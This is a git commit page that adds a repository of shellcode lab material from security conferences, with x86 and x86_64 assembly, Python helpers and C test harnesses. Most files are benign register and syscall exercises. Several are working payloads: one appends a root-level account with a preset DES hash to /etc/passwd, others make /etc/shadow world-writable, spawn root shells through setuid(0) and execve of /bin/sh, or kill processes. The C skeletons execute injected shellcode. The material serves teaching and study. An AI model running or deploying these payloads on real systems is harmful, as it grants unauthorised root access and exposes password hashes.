dash/shellcode
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

init

Browse Source
This commit is contained in:
Daniel Ashton
2016-05-30 09:06:47 +02:00
commit cc0cee84ff
27 changed files with 555 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

16
README Normal file
View File

@@ -0,0 +1,16 @@
_____ __ __ ___ _ _ __ ___ ___ ___ _ ____ ____
/ ___/| | | / _]| | | | / ] / \ | \ / _] | | / || \
( \_ | | | / [_ | | | | / / | || \ / [_ _____ | | | o || o )
\__ || _ || _]| |___ | |___ / / | O || D || _] || |___ | || |
/ \ || | || [_ | || / \_ | || || [_|_____|| || _ || O |
\ || | || || || \ || || || | | || | || |
\___||__|__||_____||_____||_____|\____| \___/ |_____||_____| |_____||__|__||_____|
Collection of Shellcode Lab Sessions at from different cons the past years. Consists of PDF Slides and Example codes.
x86_32 - This is the Shellcode Lab for IA-32 saying 32Bit Intel CPUs
x86_64 - This is the Shellcode Lab for IA-64 saying 64Bit CPUs
Cheers
dash

53
x86_32/Example_Code/adduser_etc_passwd.asm Normal file
View File

@@ -0,0 +1,53 @@
; shellcode lab @ hack4
; dash
BITS 32
global _start
_start:
xor eax, eax
xor ebx, ebx
xor ecx, ecx
mov eax, 5
push ebx
push 0x64777373
push 0x61702f63
push 0x74652f2f
mov ebx, esp
mov ecx, 0x401
int 0x80
; take filedescriptor
xor ebx, ebx
mov ebx, eax
; write(f_open, line, 24)
xor eax, eax
xor ecx, ecx
mov eax, 4
push ecx
push byte 0x0a
push 0x68736162
push 0x2f6e6962
push 0x2f3a746f
push 0x6f722f3a
push 0x3a303a30
push 0x3a494e73
push 0x386b5a39
push 0x65736d48
push 0x42413a72
push 0x336b6361
push 0x68316f6e
mov ecx, esp
mov edx, 45
int 0x80
;close maybe?? ah forget that :>
; exit(23)
mov eax, 1
mov ebx, 23
int 0x80

21
x86_32/Example_Code/ascii_converter.py Normal file
View File

@@ -0,0 +1,21 @@
#!/usr/bin/env python
#
# ascii converter for shellcoding-lab at hack4
# ~dash in 2014
#
import sys
import binascii
text = sys.argv[1]
def usage():
print "./%s <string2convert>" % (sys.argv[0])
if len(sys.argv)<2:
usage()
exit()
val = binascii.hexlify(text[::-1])
print "Stringlen: %d" % len(text)
print "String: %s" % val

29
x86_32/Example_Code/ascii_converter2.py Normal file
View File

@@ -0,0 +1,29 @@
#!/usr/bin/env python
import sys
import binascii
text = sys.argv[1]
def usage():
print "./%s <string2convert>" % (sys.argv[0])
if len(sys.argv)<2:
usage()
exit()
val = binascii.hexlify(text[::-1])
print "Stringlen: %d" % len(text)
print "String: %s" % val
print
for i in range(len(val)):
if i % 8 == 0:
print "push 0x",
print "\b%c" % val[i],
i=i+1
k = i % 8
if k == 0:
print

21
x86_32/Example_Code/bad_setuid_shell.asm Normal file
View File

@@ -0,0 +1,21 @@
global _start
section .text
_start:
;setuid
xor eax, eax
mov ebx, eax
mov eax, 11
int 0x80
;execve
xor ecx, ecx
push ecx
push 0x69732f2f
push 0x6e69622f
mov ebx, esp
mov edx, 0x00000000
xor eax, eax
mov eax, 11
int 0x80

27
x86_32/Example_Code/chmod_shadow_0bytes.asm Normal file
View File

@@ -0,0 +1,27 @@
; shellcodelab@hack4
; by dash
BITS 32
global _start
_start:
xor eax, eax
xor ebx, ebx
xor ecx, ecx
;chmod
mov ecx, 0x1ff ;0777
push ebx ;null terminator
push 0x776f6461 ;/etc/shadow
push 0x68732f63
push 0x74652f2f
mov ebx, esp ;put the address of esp to ebx (shadow)
mov eax, 15
int 0x80
;exit
xor eax, eax
xor ebx, ebx
mov eax, 1
int 0x80

26
x86_32/Example_Code/chmod_shadow_no0.asm Normal file
View File

@@ -0,0 +1,26 @@
; shellcode-lab@hack4
; by dash
BITS 32
global _start
_start:
xor eax, eax
xor ebx, ebx
xor ecx, ecx
;chmod
mov cx, 0x1ff ;0777
push ebx ;null terminator
push 0x776f6461 ;/etc/shadow
push 0x68732f63
push 0x74652f2f
mov ebx, esp ;put the address of esp to ebx (shadow)
mov al, 15
int 0x80
;exit
xor eax, eax
xor ebx, ebx
mov al, 1
int 0x80

19
x86_32/Example_Code/crypt_des_tool.py Normal file
View File

@@ -0,0 +1,19 @@
#!/usr/bin/env python2
#
# crypt des tool for shellcoding lab at hack4
# ~dash
import sys
import crypt
def usage():
print "%s <password>" % (sys.argv[0])
if len(sys.argv)<2:
usage()
exit()
password = sys.argv[1]
pw = crypt.crypt(password,'AB')
print "Password: %s" % pw

20
x86_32/Example_Code/shell.c Normal file
View File

@@ -0,0 +1,20 @@
/* shell.c
simple shell for shellcoding-lab at hack4 0x1
probably ripped somewhere
~dash
*/
#include <stdio.h>
#include <unistd.h>
#include <string.h>
int main(){
char *args[2];
setuid(0);
args[0] = "/bin/sh";
args[1] = NULL;
execve(args[0], args, NULL);
}

26
x86_32/Example_Code/skeleton_mmap.c Normal file
View File

@@ -0,0 +1,26 @@
#include <string.h>
#include <sys/mman.h>
char shellcode[] = "";
int main(int argc, char **argv)
{
// Allocate some read-write memory
void *mem = mmap(0, sizeof(shellcode), PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
// Copy the shellcode into the new memory
memcpy(mem, shellcode, sizeof(shellcode));
// Make the memory read-execute
mprotect(mem, sizeof(shellcode), PROT_READ|PROT_EXEC);
// Call the shellcode
int (*func)();
func = (int (*)())mem;
(int)(*func)();
// Now, if we managed to return here, it would be prudent to clean up the memory:
munmap(mem, sizeof(shellcode));
return 0;
}

15
x86_32/Example_Code/skeleton_oldstyle.c Normal file
View File

@@ -0,0 +1,15 @@
#include <stdio.h>
#include <string.h>
#include <unistd.h>
char shellcode[] = "";
int main(void)
{
int *ret;
printf("%d\n",strlen(shellcode));
ret = (int *)&ret+2;
*ret = (int)shellcode;
return 0;
}

BIN
x86_32/Shellcode-Lab32_0x01.pdf Normal file
View File

Binary file not shown.

18
x86_64/Example_Code/8bit.asm Normal file
View File

@@ -0,0 +1,18 @@
; 8 bit registers 'undocumented', test
; dash@hack4.org
; May 2016
;
; wikipedia, shellcode trainings no access to certain cpu registers in 8 bit mode
; however, they are addressable
; just adding right now a l to 16bit registers
;
BITS 64
global _start
_start:
mov spl, 1
mov bpl, 2
mov sil, 3
mov dil, 4

22
x86_64/Example_Code/byte_placement_r10.asm Normal file
View File

@@ -0,0 +1,22 @@
; shellcode-lab64bit
; dash@hack4.org
; byte placements on 64 bit - example for new register r10
BITS 64
global _start
_start:
; former general purpose register
sub r10, r10
mov r10, 0x4142434445464748
sub r10, r10
mov r10d, 0x41424344
sub r10d, r10d
mov r10w, 0x4142
sub r10w, r10w
mov r10b,0x42
sub r10b, r10b

28
x86_64/Example_Code/byte_placement_rax.asm Normal file
View File

@@ -0,0 +1,28 @@
; shellcode-lab64bit
; dash@hack4.org
; byte placements on 64 bit - example
BITS 64
global _start
_start:
; former general purpose register, example
; sub is used to clear out the register
sub rax, rax
mov rax, 0x4142434445464748
sub rax, rax
mov eax, 0x41424344
sub eax, eax
; address 16bit
mov ax, 0x4142
; overwrite the higher byte of ax
; 0x4142 gets to 0x2d42
mov ah,0x2d
sub ah, ah
mov al,0x41
sub al, al

22
x86_64/Example_Code/clear_register.asm Normal file
View File

@@ -0,0 +1,22 @@
; shellcode-lab64
; dash@hack4.org
;
; some example to zero-out a register
BITS 64
global _start
_start:
xor rax, rax ; initial clearing - classic xor
mov rax, 0xDEADBEEF
sub rax, rax ; sub opcode
mov rax, 0xF00DBABE
xor rax, rax ; classic xor
; check value of register and add or sub from that
; let's assume 29A is in the register rcx
sub rcx, rcx
mov rcx, 0x29A
sub rcx, 666
; zero'd

21
x86_64/Example_Code/execve.asm Normal file
View File

@@ -0,0 +1,21 @@
BITS 64
global _start
_start:
xor rax, rax
push rax ; null terminator for the string
mov rbx, 0x68732f6e69622f2f ; //bin/sh backwards
push rbx ;
mov rdi, rsp ; move address from stack pointer to first argument
push rax
push rdi ; actually we would not need this one
mov rsi, rsp ; move the address to the 2nd argument
mov rdx, rax ; no envp necessary
mov al,0x3B ; execve into rax
syscall

29
x86_64/Example_Code/execve_setuid.asm Normal file
View File

@@ -0,0 +1,29 @@
BITS 64
global _start
_start:
xor rax, rax
push rax ; push the cleared register
pop rdi ; pop the zer0z into 1st argument
add al,0x69 ; setuid 105 or 0x69h
syscall ; call setuid(0)
xor rax, rax
push rax ; null terminator for the string
mov rbx, 0x68732f6e69622f2f ; //bin/sh backwards
push rbx ;
mov rdi, rsp ; move address from stack pointer to first argument
push rax
push rdi ; actually we would not need this one
mov rsi, rsp ; move the address to the 2nd argument
mov rdx, rax ; no envp necessary
mov al,0x3B ; execve into rax
syscall

14
x86_64/Example_Code/exit.asm Normal file
View File

@@ -0,0 +1,14 @@
; shellcode lab 64Bit
; exit example as it should be ;)
; dsah@hack4.org
;
BITS 64
global _start
_start:
xor rax,rax
xor rdx,rdx
mov al,0x3C
mov dil,4
syscall

16
x86_64/Example_Code/exit_nulls.asm Normal file
View File

@@ -0,0 +1,16 @@
; shellcode-lab 64Bit
; dash@hack4.org
; exit code with null bytes
;
BITS 64
global _start
_start:
xor rax,rax
xor rdx,rdx
mov rax,0x3C
mov rdx,4
syscall

27
x86_64/Example_Code/kill.asm Normal file
View File

@@ -0,0 +1,27 @@
; shellcode-lab 64Bit
; dash@hack4.org
; kill + exit
;
BITS 64
global _start
_start:
xor rax, rax
xor rdi, rdi
xor rsi, rsi
mov dil, 1368
mov sil,9
mov al, 62
syscall
xor rax, rax
xor rdi, rdi
add dil, 4
mov al, 60
syscall

18
x86_64/Example_Code/kill_noexit.asm Normal file
View File

@@ -0,0 +1,18 @@
; shellcode-lab64bit
; dash@hack4.org
; don't execute that as root, as long as adjusted
;
BITS 64
global _start
_start:
xor rax, rax
xor rdi, rdi
xor rsi, rsi
mov dil, 1 ; you might not want to run that as root
mov sil,9
mov al, 62
syscall

16
x86_64/Example_Code/push.asm Normal file
View File

@@ -0,0 +1,16 @@
; shellcode-lab64
; dash@hack4.org
; push example and 8byte fun on 64bit architecture
;
BITS 64
global _start
_start:
push byte 0x41
push word 0x4142
push dword 0x41424344
; let's comment that out
; comment it in to see the compile error
;push 0x4142434445464748

14
x86_64/Example_Code/push_mov.asm Normal file
View File

@@ -0,0 +1,14 @@
; shellcode-lab64
; dash@hack4.org
; push example and 8byte fun on 64bit architecture
; use mov to bring up your 8byte value on the stack
;
BITS 64
global _start
_start:
xor rax, rax ; clear register
mov rax, 0x4142434445464748 ; place 8byte in register rax
push rax ; push it onto the stack

17
x86_64/Example_Code/skeleton.c Normal file
View File

@@ -0,0 +1,17 @@
/* shellcode-lab 64Bit
dash@hack4.org
use -z execstack
or set char code to const
*/
#include <stdio.h>
#include <string.h>
unsigned char code[] ="shellcode wants to be placed here!";
main()
{
printf("Shellcode Len: %d\n", (int)strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

20
x86_64/Example_Code/xchg.asm Normal file
View File

@@ -0,0 +1,20 @@
; xchg example code
; dash@hack4.org
; shellcode lab
; may 2016
BITS 64
global _start
_start:
xor rax, rax
xor rbx, rbx
mov rax, 0x29A ; http://web.textfiles.com/ezines/29A/
mov rbx, 0x539
mov r10, 0xBEEFBEEFBEEFBEEF
xchg rax, r10
xchg r10, r9
xchg rbx, rax
xchg rdi,rsp

BIN
x86_64/Shellcode-Lab64_0x01.pdf Normal file
View File

Binary file not shown.